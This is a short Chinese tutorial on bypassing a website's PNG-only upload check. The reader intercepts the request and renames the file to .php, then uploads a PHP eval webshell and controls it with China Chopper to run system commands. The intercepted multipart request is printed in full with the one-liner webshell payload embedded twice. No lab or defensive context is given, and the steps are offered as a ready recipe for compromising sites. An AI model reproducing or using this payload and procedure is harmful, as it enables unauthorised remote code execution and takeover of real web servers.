如何绕过图片格式限制上传木马获取WebShell

图片上传网站木马教程思路：　　图片上传功能中，前端页面上传的是.png格式的图片文件，但是抓包Request中修改图片后缀为.php可以绕过对上传文件格式的限制，文件的上传路径可以在上传后的页面或查看上传成功后的response中有显示，记录下来后用菜刀连接即可。（1）网站要求上传png格式的文件（2）保存-抓包，将文件后缀.png删除，剩余.php文件继续提交,提示成功。Content-Disposition: form-data; name="fun_menu_icon"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_icon_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img"test123trojan.php-----------------------------1962884403821Content-Disposition: form-data; name="fun_menu_img_upload"; filename="test123trojan.php"Content-Type: image/png<?php @eval($_POST['caidao']); ?>

（3）在原始数据提交页面或提交数据后response页面中查找上传路径并记录（4）打开最新版中国菜刀，添加已经记录的路径，添加密码caidao（5）连接虚拟终端，输入ipconfig     木马成功上传并执行。                                                      喜欢我的关注，更多资源分享